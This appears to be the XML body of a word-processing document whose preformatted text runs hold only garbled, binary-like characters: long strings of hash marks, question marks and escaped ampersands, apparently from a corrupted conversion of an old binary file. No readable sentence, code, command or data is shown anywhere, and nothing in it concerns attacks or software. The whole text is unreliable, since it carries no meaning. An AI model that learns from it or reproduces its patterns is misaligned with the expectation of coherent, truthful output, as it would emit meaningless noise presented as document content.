        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:br/>
        <w:t>##????????p?n###?###?#####?###?#####?###?#####?###?#####?###?#####?###?#####?###?#####?###?#####?###?##??????????###?###?##yt?x?#?#kd;?###$##$#If#####?l##?Y##??##???#?#?#?#?##$q(?,w1?5}:?&amp;##################?&amp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??########?&amp;?#####????########?&amp;?#####????########?&amp;?#####????########?&amp;?#####????########?&amp;Y#####????########?&amp;######????########?&amp;?#####????##########?#####????####?????&amp;?#####????########</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?#?:#6##?####?####?,###?###?###?###?###?###?###?###?###?###?###?#?,###?????????????????????????????????????????#?,###?###?###?###?###?###?###?###?###?###?###?#?,###?###?###?###?###?###?###?###?###?????###?#??#4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###p?n###?###?#####?###?#####?###?#####?###?#####?###?#####?###?#####?###?#####?###?#####?###?##??????????###?###?##yt?x?#?##$##$#If#####?##!v##h#5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>#?#5?#</w:t>
        <w:br/>
        <w:t>##?##v#####v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Y##v#####v#</w:t>
        <w:tab/>
        <w:t>?##v</w:t>
        <w:tab/>
        <w:t>#?#:V###?l##?Y#</w:t>
        <w:tab/>
        <w:t>?#########@#@#@#@#@#@#@#</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####?T??######?T??######?T??######?T??######?T??######?T??######?T??####?#?:#6##?####??#,?##</w:t>
        <w:tab/>
        <w:t>#,?#</w:t>
        <w:br/>
        <w:t>##5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:t>##?#9?##</w:t>
        <w:tab/>
        <w:t>#9?#</w:t>
        <w:br/>
        <w:t>##/?#######?####/?####????????/?####????????/?##</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#######?####/?#######?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:br/>
        <w:t>????????/?##</w:t>
        <w:tab/>
        <w:t>#????????/?#</w:t>
        <w:br/>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:br/>
        <w:t>##????????p?n###?###?#####?###?#####?###?#####?###?#####?T??######?T??######?T??######?T??######?T??######?T??######?T??###yt?x?###kd??###$##$#If#####?l##?Y##??##???#?#?#?#?##$q(?,w1?5}:?&amp;##????############?&amp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&amp;?#????????########?&amp;?#????????########?&amp;?#####????########?&amp;?#####????########?&amp;Y#####????########?&amp;######????########?&amp;?#####????##########?#####????####?????&amp;?#####????########</w:t>
        <w:tab/>
        <w:t>?#########@#@#@#@#@#@#@#</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####?T??######?T??######?T??######?T??######?T??######?T??######?T??####?#?:#6##?####?####?,????????????????###?###?###?###?###?###?###?#?,###?????????????????????????????????????????#?,###?###?###?###?###?###?###?###?###?###?###?#?,###?###?###?###?###?###?###?###?###?????###?#??#4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###p?n###?###?#####?###?#####?###?#####?###?#####?T??######?T??######?T??######?T??######?T??######?T??######?T??###yt?x?#?##$##$#If#####?##!v##h#5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>#?#5?#</w:t>
        <w:br/>
        <w:t>##?##v#####v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Y##v#####v#</w:t>
        <w:tab/>
        <w:t>?##v</w:t>
        <w:tab/>
        <w:t>#?#:V###?l##?Y#</w:t>
        <w:tab/>
        <w:t>?###########@###########</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####????######?T??######????######????######????######????######????####?#?:#6##?####??#,?##</w:t>
        <w:tab/>
        <w:t>#,?#</w:t>
        <w:br/>
        <w:t>##5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:t>##?#9?##</w:t>
        <w:tab/>
        <w:t>#9?#</w:t>
        <w:br/>
        <w:t>##/?#######?####/?####????????/?####????????/?##</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#######?####/?#######?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:br/>
        <w:t>????????/?##</w:t>
        <w:tab/>
        <w:t>#????????/?#</w:t>
        <w:br/>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:br/>
        <w:t>##????????p?n###?###?#####?###?#####?###?#####?###?#####????######?T??######????######????######????######????######????###yt?x?###kd??###$##$#If#####?l##?Y##??##???#?#?#?#?##$q(?,w1?5}:?&amp;##????############?&amp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&amp;?#????????########?&amp;?#????????########?&amp;?#####????########?&amp;?#####????########?&amp;Y#####????########?&amp;######????########?&amp;?#####????##########?#####????####?????&amp;?#####????########</w:t>
        <w:tab/>
        <w:t>?###########@###########</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####????######?T??######????######????######????######????######????####?#?:#6##?####?####?,????????????????###?###?###?###?###?###?###?#?,###?????????????????????????????????????????#?,###?###?###?###?###?###?###?###?###?###?###?#?,###?###?###?###?###?###?###?###?###?????###?#??#4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###p?n###?###?#####?###?#####?###?#####?###?#####????######?T??######????######????######????######????######????###yt?x?#?##$##$#If#####?##!v##h#5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>#?#5?#</w:t>
        <w:br/>
        <w:t>##?##v#####v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Y##v#####v#</w:t>
        <w:tab/>
        <w:t>?##v</w:t>
        <w:tab/>
        <w:t>#?#:V###?l##?Y#</w:t>
        <w:tab/>
        <w:t>?###########@#@#########</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####????######?T??######?T??######????######????######????######????####?#?:#6##?####??#,?##</w:t>
        <w:tab/>
        <w:t>#,?#</w:t>
        <w:br/>
        <w:t>##5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:t>##?#9?##</w:t>
        <w:tab/>
        <w:t>#9?#</w:t>
        <w:br/>
        <w:t>##/?#######?####/?####????????/?####????????/?##</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#######?####/?#######?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:br/>
        <w:t>????????/?##</w:t>
        <w:tab/>
        <w:t>#????????/?#</w:t>
        <w:br/>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:br/>
        <w:t>##????????p?n###?###?#####?###?#####?###?#####?###?#####????######?T??######?T??######????######????######????######????###yt?x?###kd??###$##$#If#####?l##?Y##??##???#?#?#?#?##$q(?,w1?5}:?&amp;##????############?&amp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&amp;?#????????########?&amp;?#????????########?&amp;?#####????########?&amp;?#####????########?&amp;Y#####????########?&amp;######????########?&amp;?#####????##########?#####????####?????&amp;?#####????########</w:t>
        <w:tab/>
        <w:t>?###########@#@#########</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####????######?T??######?T??######????######????######????######????####?#?:#6##?####?####?,????????????????###?###?###?###?###?###?###?#?,###?????????????????????????????????????????#?,###?###?###?###?###?###?###?###?###?###?###?#?,###?###?###?###?###?###?###?###?###?????###?#??#4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###p?n###?###?#####?###?#####?###?#####?###?#####????######?T??######?T??######????######????######????######????###yt?x?#</w:t>
        <w:tab/>
        <w:t>##$##$#If#####?##!v##h#5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>#?#5?#</w:t>
        <w:br/>
        <w:t>##?##v#####v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Y##v#####v#</w:t>
        <w:tab/>
        <w:t>?##v</w:t>
        <w:tab/>
        <w:t>#?#:V###?l##?Y#</w:t>
        <w:tab/>
        <w:t>?#########@#@#@#@#@#@#@#</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####?T??######?T??######?T??######?T??######?T??######?T??######?T??####?#?:#6##?####??#,?##</w:t>
        <w:tab/>
        <w:t>#,?#</w:t>
        <w:br/>
        <w:t>##5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:t>##?#9?##</w:t>
        <w:tab/>
        <w:t>#9?#</w:t>
        <w:br/>
        <w:t>##/?#######?####/?####????????/?####????????/?#######?####/?####????????/?####????????/?##</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#######?####/?#######?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:br/>
        <w:t>????????/?##</w:t>
        <w:tab/>
        <w:t>#????????/?#</w:t>
        <w:br/>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:br/>
        <w:t>##????????p?n###?###?#####?###?#####?###?#####?###?#####?T??######?T??######?T??######?T??######?T??######?T??######?T??###yt?x?###kd?####$##$#If#####?l##?Y##??##???#?#?#?#?##$q(?,w1?5}:?&amp;##????############?&amp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?????&amp;?#????############?&amp;?#????????########?&amp;?#####????########?&amp;?#####????########?&amp;Y#####????########?&amp;######????########?&amp;?#####????##########?#####????####?????&amp;?#####????########</w:t>
        <w:tab/>
        <w:t>?#########@#@#@#@#@#@#@#</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####?T??######?T??######?T??######?T??######?T??######?T??######?T??####?#?:#6##?####?####?,????????????????###?###?###?###?###?###?###?#?,###?????###?????????????????????????????????#?,###?????###?###?###?###?###?###?###?###?###?#?,###?????###?###?###?###?###?###?###?????###?#??#4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###p?n###?###?#####?###?#####?###?#####?###?#####?T??######?T??######?T??######?T??######?T??######?T??######?T??###yt?x?#?##$##$#If#####?##!v##h#5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>#?#5?#</w:t>
        <w:br/>
        <w:t>##?##v#####v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Y##v#####v#</w:t>
        <w:tab/>
        <w:t>?##v</w:t>
        <w:tab/>
        <w:t>#?#:V###?l##?Y#</w:t>
        <w:tab/>
        <w:t>?###############@#######</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####????######????######????######?T??######????######????######????####?#?:#6##?####??#,?##</w:t>
        <w:tab/>
        <w:t>#,?#</w:t>
        <w:br/>
        <w:t>##5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:t>##?#9?##</w:t>
        <w:tab/>
        <w:t>#9?#</w:t>
        <w:br/>
        <w:t>##/?####????????/?#######?####/?###</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?####????????/?####????????/?##</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#######?####/?#######?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:br/>
        <w:t>????????/?##</w:t>
        <w:tab/>
        <w:t>#????????/?#</w:t>
        <w:br/>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:br/>
        <w:t>##????????p?n###?###?#####?###?#####?###?#####?###?#####????######????######????######?T??######????######????######????###yt?x?###kd?</w:t>
        <w:br/>
        <w:t>###$##$#If#####?l##?Y##??##???#?#?#?#?##$q(?,w1?5}:?&amp;##????############?&amp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??########?&amp;?#????????########?&amp;?#????????########?&amp;?#####????########?&amp;?#####????########?&amp;Y#####????########?&amp;######????########?&amp;?#####????##########?#####????####?????&amp;?#####????########</w:t>
        <w:tab/>
        <w:t>?###############@#######</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####????######????######????######?T??######????######????######????####?#?:#6##?####?####?,????###?????????###?###?###?###?###?###?###?#?,###?????????????????????????????????????????#?,###?###?###?###?###?###?###?###?###?###?###?#?,###?###?###?###?###?###?###?###?###?????###?#??#4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###p?n###?###?#####?###?#####?###?#####?###?#####????######????######????######?T??######????######????######????###yt?x?#?##$##$#If#####?##!v##h#5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>#?#5?#</w:t>
        <w:br/>
        <w:t>##?##v#####v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Y##v#####v#</w:t>
        <w:tab/>
        <w:t>?##v</w:t>
        <w:tab/>
        <w:t>#?#:V###?l##?Y#</w:t>
        <w:tab/>
        <w:t>?#######################</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####????######????######????######????######????######????######????####?#?:#6##?####??#,?##</w:t>
        <w:tab/>
        <w:t>#,?#</w:t>
        <w:br/>
        <w:t>##5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:t>##?#9?##</w:t>
        <w:tab/>
        <w:t>#9?#</w:t>
        <w:br/>
        <w:t>##/?#######?####/?####????????/?####????????/?##</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#######?####/?#######?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:br/>
        <w:t>????????/?##</w:t>
        <w:tab/>
        <w:t>#????????/?#</w:t>
        <w:br/>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:br/>
        <w:t>##????????p?n###?###?#####?###?#####?###?#####?###?#####????######????######????######????######????######????######????###yt?x?###kd?####$##$#If#####?l##?Y##??##???#?#?#?#?##$q(?,w1?5}:?&amp;##????############?&amp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&amp;?#????????########?&amp;?#????????########?&amp;?#####????########?&amp;?#####????########?&amp;Y#####????########?&amp;######????########?&amp;?#####????##########?#####????####?????&amp;?#####????########</w:t>
        <w:tab/>
        <w:t>?#######################</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####????######????######????######????######????######????######????####?#?:#6##?####?####?,????????????????###?###?###?###?###?###?###?#?,###?????????????????????????????????????????#?,###?###?###?###?###?###?###?###?###?###?###?#?,###?###?###?###?###?###?###?###?###?????###?#??#4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###p?n###?###?#####?###?#####?###?#####?###?#####????######????######????######????######????######????######????###yt?x?#?##$##$#If#####?##!v##h#5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>#?#5?#</w:t>
        <w:br/>
        <w:t>##?##v#####v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Y##v#####v#</w:t>
        <w:tab/>
        <w:t>?##v</w:t>
        <w:tab/>
        <w:t>#?#:V###?l##?Y#</w:t>
        <w:tab/>
        <w:t>?#######################</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####????######????######????######????######????######????######????####?#?:#6##?####??#,?##</w:t>
        <w:tab/>
        <w:t>#,?#</w:t>
        <w:br/>
        <w:t>##5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:t>##?#9?##</w:t>
        <w:tab/>
        <w:t>#9?#</w:t>
        <w:br/>
        <w:t>##/?#######?####/?####????????/?####????????/?##</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#######?####/?#######?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:br/>
        <w:t>????????/?##</w:t>
        <w:tab/>
        <w:t>#????????/?#</w:t>
        <w:br/>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:br/>
        <w:t>##????????p?n###?###?#####?###?#####?###?#####?###?#####????######????######????######????######????######????######????###yt?x?###kd?####$##$#If#####?l##?Y##??##???#?#?#?#?##$q(?,w1?5}:?&amp;##????############?&amp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&amp;?#????????########?&amp;?#????????########?&amp;?#####????########?&amp;?#####????########?&amp;Y#####????########?&amp;######????########?&amp;?#####????##########?#####????####?????&amp;?#####????########</w:t>
        <w:tab/>
        <w:t>?#######################</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####????######????######????######????######????######????######????####?#?:#6##?####?####?,????????????????###?###?###?###?###?###?###?#?,###?????????????????????????????????????????#?,###?###?###?###?###?###?###?###?###?###?###?#?,###?###?###?###?###?###?###?###?###?????###?#??#4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###p?n###?###?#####?###?#####?###?#####?###?#####????######????######????######????######????######????######????###yt?x?#?##$##$#If#####?##!v##h#5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>#?#5?#</w:t>
        <w:br/>
        <w:t>##?##v#####v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Y##v#####v#</w:t>
        <w:tab/>
        <w:t>?##v</w:t>
        <w:tab/>
        <w:t>#?#:V###?l##?Y#</w:t>
        <w:tab/>
        <w:t>?#######################</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####????######????######????######????######????######????######????####?#?:#6##?####??#,?##</w:t>
        <w:tab/>
        <w:t>#,?#</w:t>
        <w:br/>
        <w:t>##5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:t>##?#9?##</w:t>
        <w:tab/>
        <w:t>#9?#</w:t>
        <w:br/>
        <w:t>##/?#######?####/?####????????/?####????????/?##</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#######?####/?#######?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:br/>
        <w:t>????????/?##</w:t>
        <w:tab/>
        <w:t>#????????/?#</w:t>
        <w:br/>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>###?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>####?####/?#</w:t>
        <w:br/>
        <w:t>##????????p?n###?###?#####?###?#####?###?#####?###?#####????######????######????######????######????######????######????###yt?x?###kd?####$##$#If#####?l##?Y##??##???#?#?#?#?##$q(?,w1?5}:?&amp;##????############?&amp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&amp;?#????????########?&amp;?#????????########?&amp;?#####????########?&amp;?#####????########?&amp;Y#####????########?&amp;######????########?&amp;?#####????##########?#####????####?????&amp;?#####????########</w:t>
        <w:tab/>
        <w:t>?#######################</w:t>
        <w:br/>
        <w:t>t##?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6?#?###?@</w:t>
        <w:tab/>
        <w:t>#??##?n###?###?#####?###?#####?###?#####?###?#####????######????######????######????######????######????######????####?#?:#6##?####?####?,????????????????###?###?###?###?###?###?###?#?,###?????????????????????????????????????????#?,###?###?###?###?###?###?###?###?###?###?###?#?,###?###?###?###?###?###?###?###?###?????###?#??#4?#######4?###</w:t>
        <w:br/>
        <w:t>#l#a?###p?n###?###?#####?###?#####?###?#####?###?#####????######????######????######????######????######????######????###yt?x?#?##$##$#If#####?##!v##h#5?######5?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Y#5?######5?##</w:t>
        <w:tab/>
        <w:t>#?#5?#</w:t>
        <w:tab/>
        <w:br/>
        <w:t>#?#5?#</w:t>
        <w:br/>
        <w:t>##?##v#####v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Y##v#####v#</w:t>
        <w:tab/>
        <w:t>?##v</w:t>
        <w:tab/>
        <w:t>#?#:V###?l##?Y#</w:t>
        <w:tab/>
